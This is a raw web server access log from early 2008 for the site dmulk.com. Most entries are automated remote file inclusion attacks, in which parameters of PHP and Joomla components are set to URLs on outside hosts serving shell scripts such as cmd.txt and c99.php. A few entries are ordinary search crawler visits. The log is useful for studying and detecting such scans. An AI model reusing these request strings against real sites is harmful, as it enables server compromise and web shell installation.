193.28.153.174 - - [31/Jan/2008:10:16:09 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:10:16:09 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:10:16:10 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:10:17:08 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.186.240 - - [31/Jan/2008:10:17:57 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.182.186.240 - - [31/Jan/2008:10:17:57 -0800] "GET //skin/zero_vote/error.php?dir=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.182.186.240 - - [31/Jan/2008:10:17:57 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.249.117.99 - - [31/Jan/2008:10:18:07 -0800] "GET /logs/access_071231.log//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.249.117.99 - - [31/Jan/2008:10:18:07 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.249.117.99 - - [31/Jan/2008:10:18:08 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.139.219.235 - - [31/Jan/2008:10:18:43 -0800] "GET /logs/access_071230.log//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.184.150 - - [31/Jan/2008:10:18:56 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bakhshian.ir/language/lang/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [31/Jan/2008:10:18:57 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bakhshian.ir/language/lang/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [31/Jan/2008:10:19:03 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bakhshian.ir/language/lang/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.182.186.240 - - [31/Jan/2008:10:19:03 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.terranova.dk/files/scandiertbanner.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.57 - - [31/Jan/2008:10:19:18 -0800] "GET /index.php?redir=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.238.65.152 - - [31/Jan/2008:10:19:38 -0800] "GET /logs/access_071231.log//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.238.65.152 - - [31/Jan/2008:10:19:39 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.238.65.152 - - [31/Jan/2008:10:19:39 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.161.5.91 - - [31/Jan/2008:10:19:42 -0800] "GET /index.php?redir=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.183.154 - - [31/Jan/2008:10:19:58 -0800] "GET /logs/access_071230.log//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.184.3.228 - - [31/Jan/2008:10:20:11 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.29.114 - - [31/Jan/2008:10:20:29 -0800] "GET /logs/access_071230.log//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.176.228.30 - - [31/Jan/2008:10:20:41 -0800] "GET //skin/zero_vote/error.php?dir=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
81.176.228.30 - - [31/Jan/2008:10:20:41 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
62.193.231.110 - - [31/Jan/2008:10:20:58 -0800] "GET /logs/access_071231.log//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.231.110 - - [31/Jan/2008:10:20:59 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.231.110 - - [31/Jan/2008:10:20:59 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.77.45 - - [31/Jan/2008:10:21:27 -0800] "GET /logs/access_071230.log//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.209.168 - - [31/Jan/2008:10:21:49 -0800] "GET /logs/access_071230.log//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.237.144.235 - - [31/Jan/2008:10:21:54 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [31/Jan/2008:10:21:55 -0800] "GET //?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [31/Jan/2008:10:21:56 -0800] "GET /logs//?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 200 33218 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [31/Jan/2008:10:22:17 -0800] "GET /logs/access_071229.log//?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.239.146.66 - - [31/Jan/2008:10:23:02 -0800] "GET /logs/access_071231.log//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.239.146.66 - - [31/Jan/2008:10:23:02 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.239.146.66 - - [31/Jan/2008:10:23:03 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.103.8.225 - - [31/Jan/2008:10:24:12 -0800] "GET /logs/access_071229.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://211.21.117.172/all.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.103.8.225 - - [31/Jan/2008:10:24:12 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://211.21.117.172/all.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.103.8.225 - - [31/Jan/2008:10:24:12 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://211.21.117.172/all.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.103.8.225 - - [31/Jan/2008:10:24:38 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://211.21.117.172/all.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.238.65.152 - - [31/Jan/2008:10:24:41 -0800] "GET /logs/access_071230.log//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.248.237.210 - - [31/Jan/2008:10:24:53 -0800] "GET /index.php?redir=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.91.155.2 - - [31/Jan/2008:10:26:11 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.th1nk3r.kit.net/cmd/c99.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.249.117.99 - - [31/Jan/2008:10:26:35 -0800] "GET /logs/access_071230.log//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.231.110 - - [31/Jan/2008:10:26:59 -0800] "GET /logs/access_071230.log//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.190.51.202 - - [31/Jan/2008:10:27:28 -0800] "GET /logs/scripts.log//index.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.190.51.202 - - [31/Jan/2008:10:27:28 -0800] "GET //index.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.190.51.202 - - [31/Jan/2008:10:27:29 -0800] "GET /logs//index.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.39 - - [31/Jan/2008:10:27:58 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.67.27.39 - - [31/Jan/2008:10:27:58 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
62.75.224.62 - - [31/Jan/2008:10:28:43 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://vwar.lhl-clan.de//convert/.../cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.224.62 - - [31/Jan/2008:10:28:48 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://vwar.lhl-clan.de//convert/.../cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.224.62 - - [31/Jan/2008:10:28:54 -0800] "GET /logs/access_071230.log//modules/My_eGallery/public/displayCategory.php?basepath=http://vwar.lhl-clan.de//convert/.../cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
201.91.155.2 - - [31/Jan/2008:10:29:11 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.th1nk3r.kit.net/cmd/c99.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.91.155.2 - - [31/Jan/2008:10:29:11 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.th1nk3r.kit.net/cmd/c99.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.105.34 - - [31/Jan/2008:10:30:15 -0800] "GET /logs//components/com_minibb.php?absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.58.105.34 - - [31/Jan/2008:10:30:15 -0800] "GET //components/com_minibb.php?absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.91.155.2 - - [31/Jan/2008:10:30:30 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.th1nk3r.kit.net/cmd/c99.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.167.29 - - [31/Jan/2008:10:30:42 -0800] "GET /logs/access_071231.log//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.167.29 - - [31/Jan/2008:10:30:42 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.167.29 - - [31/Jan/2008:10:30:43 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.139.98 - - [31/Jan/2008:10:31:19 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [31/Jan/2008:10:31:20 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [31/Jan/2008:10:31:20 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.210 - - [31/Jan/2008:10:31:34 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.210 - - [31/Jan/2008:10:31:34 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.210 - - [31/Jan/2008:10:31:34 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [31/Jan/2008:10:31:39 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.210 - - [31/Jan/2008:10:31:49 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.143.88 - - [31/Jan/2008:10:31:55 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.143.88 - - [31/Jan/2008:10:31:55 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.143.88 - - [31/Jan/2008:10:31:56 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.10.2 - - [31/Jan/2008:10:32:10 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://hornydate.co.uk/asc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.143.88 - - [31/Jan/2008:10:32:24 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:10:32:42 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:10:32:44 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:10:32:45 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [31/Jan/2008:10:32:48 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.109 - - [31/Jan/2008:10:32:55 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.157.182.9 - - [31/Jan/2008:10:32:58 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [31/Jan/2008:10:33:01 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.144.235 - - [31/Jan/2008:10:37:52 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/BIFFwriter.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [31/Jan/2008:10:37:53 -0800] "GET //administrator/components/com_chronocontact/BIFFwriter.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [31/Jan/2008:10:37:53 -0800] "GET /logs//administrator/components/com_chronocontact/BIFFwriter.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.26.218 - - [31/Jan/2008:10:37:58 -0800] "GET /bikes/GPS/WeSTOC2006/?S=A HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.237.144.235 - - [31/Jan/2008:10:38:13 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/BIFFwriter.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.51.43.173 - - [31/Jan/2008:10:38:37 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bakhshian.ir/language/lang/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.43.173 - - [31/Jan/2008:10:38:37 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bakhshian.ir/language/lang/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.182.202 - - [31/Jan/2008:10:39:32 -0800] "GET /logs//ask_password.php?dir=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.182.202 - - [31/Jan/2008:10:39:33 -0800] "GET //ask_password.php?dir=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.234.49.129 - - [31/Jan/2008:10:39:47 -0800] "GET /logs//ask_password.php?dir=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.234.49.129 - - [31/Jan/2008:10:39:47 -0800] "GET /logs//ask_password.php?dir=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.234.49.129 - - [31/Jan/2008:10:39:47 -0800] "GET //ask_password.php?dir=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.234.49.129 - - [31/Jan/2008:10:39:47 -0800] "GET //ask_password.php?dir=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Jan/2008:10:40:04 -0800] "GET /logs//ask_password.php?dir=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Jan/2008:10:40:04 -0800] "GET /logs//ask_password.php?dir=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Jan/2008:10:40:05 -0800] "GET //ask_password.php?dir=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Jan/2008:10:40:05 -0800] "GET //ask_password.php?dir=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Jan/2008:10:40:06 -0800] "GET /logs//ask_password.php?dir=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [31/Jan/2008:10:40:07 -0800] "GET //ask_password.php?dir=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.27.39 - - [31/Jan/2008:10:41:46 -0800] "GET //components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.67.27.39 - - [31/Jan/2008:10:41:46 -0800] "GET /logs//components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:10:43:00 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.200.195.148 - - [31/Jan/2008:10:44:04 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.200.195.148 - - [31/Jan/2008:10:44:04 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.200.195.148 - - [31/Jan/2008:10:44:04 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.149.167.29 - - [31/Jan/2008:10:45:48 -0800] "GET /logs/access_071230.log//multithumb/multithumb?mosConfig_absolute_path=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.128.57.1 - - [31/Jan/2008:10:46:21 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.128.57.1 - - [31/Jan/2008:10:46:21 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.122 - - [31/Jan/2008:10:46:30 -0800] "GET /bikes/dteel/MVI_2430.AVI HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.169.187.243 - - [31/Jan/2008:10:46:42 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.187.243 - - [31/Jan/2008:10:46:42 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.248.237.210 - - [31/Jan/2008:10:46:46 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.114.21 - - [31/Jan/2008:10:47:38 -0800] "GET //components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.114.21 - - [31/Jan/2008:10:47:41 -0800] "GET /logs//components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
